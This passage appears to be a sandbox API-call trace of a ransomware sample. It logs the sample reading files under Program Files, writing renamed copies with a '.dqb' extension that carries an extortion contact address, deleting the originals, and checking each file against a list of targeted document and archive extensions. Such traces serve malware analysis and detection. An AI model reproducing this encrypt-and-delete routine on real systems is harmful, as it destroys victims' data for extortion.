lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0036.205] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.205] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.206] GetLastError () returned 0x0 [0036.206] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x42d, lpOverlapped=0x0) returned 1 [0036.490] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x430, lpOverlapped=0x0) returned 1 [0036.491] ReadFile (in: hFile=0x1a4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.491] WriteFile (in: hFile=0x180, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.491] SetEndOfFile (hFile=0x180) returned 1 [0036.491] CloseHandle (hObject=0x180) returned 1 [0036.492] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.492] SetEndOfFile (hFile=0x1a4) returned 1 [0036.493] CloseHandle (hObject=0x1a4) returned 1 [0036.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0036.493] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 1 [0036.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.493] lstrlenW (lpString=".doc") returned 4 [0036.493] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0036.493] lstrlenW (lpString=".docx") returned 5 [0036.493] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0036.493] lstrlenW (lpString=".pdf") returned 4 [0036.493] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0036.493] lstrlenW (lpString=".xls") returned 4 [0036.493] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0036.493] lstrlenW (lpString=".xlsx") returned 5 [0036.493] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0036.493] lstrlenW (lpString=".ppt") returned 4 [0036.493] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString=".zip") returned 4 [0036.494] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString=".rar") returned 4 [0036.494] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString=".bz2") returned 4 [0036.494] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0036.494] lstrlenW (lpString=".7z") returned 3 [0036.494] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString=".dbf") returned 4 [0036.494] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString=".1cd") returned 4 [0036.494] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString=".jpg") returned 4 [0036.494] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString=".doc") returned 4 [0036.494] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0036.494] lstrlenW (lpString=".docx") returned 5 [0036.494] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0036.494] lstrlenW (lpString=".pdf") returned 4 [0036.494] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString=".xls") returned 4 [0036.494] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString=".xlsx") returned 5 [0036.494] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0036.494] lstrlenW (lpString=".ppt") returned 4 [0036.494] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.494] lstrlenW (lpString=".zip") returned 4 [0036.494] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0036.494] lstrlenW (lpString=".rar") returned 4 [0036.495] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0036.495] lstrlenW (lpString=".bz2") returned 4 [0036.495] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0036.495] lstrlenW (lpString=".7z") returned 3 [0036.495] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0036.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.495] lstrlenW (lpString=".dbf") returned 4 [0036.495] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0036.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.495] lstrlenW (lpString=".1cd") returned 4 [0036.495] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0036.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0036.495] lstrlenW (lpString=".jpg") returned 4 [0036.495] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0036.495] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.495] lstrlenW (lpString="boxed-split.avi") returned 15 [0036.495] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.151] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=62976) returned 1 [0037.151] CloseHandle (hObject=0x180) returned 1 [0037.151] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0037.152] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.152] lstrlenW (lpString=".doc") returned 4 [0037.152] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString=".docx") returned 5 [0037.152] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0037.152] lstrlenW (lpString=".pdf") returned 4 [0037.152] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString=".xls") returned 4 [0037.152] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString=".xlsx") returned 5 [0037.152] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0037.152] lstrlenW (lpString=".ppt") returned 4 [0037.152] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.152] lstrlenW (lpString=".zip") returned 4 [0037.152] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString=".rar") returned 4 [0037.152] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString=".bz2") returned 4 [0037.152] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString=".7z") returned 3 [0037.152] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.152] lstrlenW (lpString=".dbf") returned 4 [0037.152] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.152] lstrlenW (lpString=".1cd") returned 4 [0037.152] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString=".jpg") returned 4 [0037.153] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString=".doc") returned 4 [0037.153] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString=".docx") returned 5 [0037.153] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0037.153] lstrlenW (lpString=".pdf") returned 4 [0037.153] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString=".xls") returned 4 [0037.153] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString=".xlsx") returned 5 [0037.153] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0037.153] lstrlenW (lpString=".ppt") returned 4 [0037.153] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString=".zip") returned 4 [0037.153] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString=".rar") returned 4 [0037.153] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString=".bz2") returned 4 [0037.153] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString=".7z") returned 3 [0037.153] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0037.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString=".dbf") returned 4 [0037.153] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0037.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString=".1cd") returned 4 [0037.153] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0037.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0037.153] lstrlenW (lpString=".jpg") returned 4 [0037.153] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0037.154] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.154] lstrlenW (lpString="ipsjpn.xml") returned 10 [0037.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.205] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2522) returned 1 [0037.205] CloseHandle (hObject=0x180) returned 1 [0037.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml")) returned 0x20 [0037.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.205] lstrlenW (lpString=".doc") returned 4 [0037.205] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.205] lstrlenW (lpString=".docx") returned 5 [0037.205] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0037.205] lstrlenW (lpString=".pdf") returned 4 [0037.205] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.205] lstrlenW (lpString=".xls") returned 4 [0037.205] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.205] lstrlenW (lpString=".xlsx") returned 5 [0037.205] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0037.205] lstrlenW (lpString=".ppt") returned 4 [0037.205] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.205] lstrlenW (lpString=".zip") returned 4 [0037.205] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.205] lstrlenW (lpString=".rar") returned 4 [0037.205] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".bz2") returned 4 [0037.206] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".7z") returned 3 [0037.206] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.206] lstrlenW (lpString=".dbf") returned 4 [0037.206] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.206] lstrlenW (lpString=".1cd") returned 4 [0037.206] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.206] lstrlenW (lpString=".jpg") returned 4 [0037.206] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.206] lstrlenW (lpString=".doc") returned 4 [0037.206] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".docx") returned 5 [0037.206] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0037.206] lstrlenW (lpString=".pdf") returned 4 [0037.206] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".xls") returned 4 [0037.206] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".xlsx") returned 5 [0037.206] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0037.206] lstrlenW (lpString=".ppt") returned 4 [0037.206] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.206] lstrlenW (lpString=".zip") returned 4 [0037.206] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.206] lstrlenW (lpString=".rar") returned 4 [0037.206] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".bz2") returned 4 [0037.206] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.206] lstrlenW (lpString=".7z") returned 3 [0037.207] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.207] lstrlenW (lpString=".dbf") returned 4 [0037.207] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.207] lstrlenW (lpString=".1cd") returned 4 [0037.207] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 61 [0037.207] lstrlenW (lpString=".jpg") returned 4 [0037.207] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.207] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.207] lstrlenW (lpString="ipskor.xml") returned 10 [0037.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.208] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2568) returned 1 [0037.208] CloseHandle (hObject=0x180) returned 1 [0037.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml")) returned 0x20 [0037.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.208] lstrlenW (lpString=".doc") returned 4 [0037.208] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.208] lstrlenW (lpString=".docx") returned 5 [0037.208] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0037.208] lstrlenW (lpString=".pdf") returned 4 [0037.209] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString=".xls") returned 4 [0037.209] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString=".xlsx") returned 5 [0037.209] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0037.209] lstrlenW (lpString=".ppt") returned 4 [0037.209] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.209] lstrlenW (lpString=".zip") returned 4 [0037.209] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.209] lstrlenW (lpString=".rar") returned 4 [0037.209] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString=".bz2") returned 4 [0037.209] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString=".7z") returned 3 [0037.209] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.209] lstrlenW (lpString=".dbf") returned 4 [0037.209] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.209] lstrlenW (lpString=".1cd") returned 4 [0037.209] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.209] lstrlenW (lpString=".jpg") returned 4 [0037.209] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.209] lstrlenW (lpString=".doc") returned 4 [0037.209] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString=".docx") returned 5 [0037.209] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0037.209] lstrlenW (lpString=".pdf") returned 4 [0037.209] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.209] lstrlenW (lpString=".xls") returned 4 [0037.210] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.210] lstrlenW (lpString=".xlsx") returned 5 [0037.210] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0037.210] lstrlenW (lpString=".ppt") returned 4 [0037.210] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.210] lstrlenW (lpString=".zip") returned 4 [0037.210] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.210] lstrlenW (lpString=".rar") returned 4 [0037.210] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.210] lstrlenW (lpString=".bz2") returned 4 [0037.210] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.210] lstrlenW (lpString=".7z") returned 3 [0037.210] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.210] lstrlenW (lpString=".dbf") returned 4 [0037.210] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.210] lstrlenW (lpString=".1cd") returned 4 [0037.210] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 61 [0037.210] lstrlenW (lpString=".jpg") returned 4 [0037.210] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.210] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0037.210] lstrlenW (lpString="ipsnld.xml") returned 10 [0037.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.211] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2626) returned 1 [0037.211] CloseHandle (hObject=0x180) returned 1 [0037.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0037.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.211] lstrlenW (lpString=".doc") returned 4 [0037.211] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.211] lstrlenW (lpString=".docx") returned 5 [0037.211] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0037.211] lstrlenW (lpString=".pdf") returned 4 [0037.211] lstrcmpiW 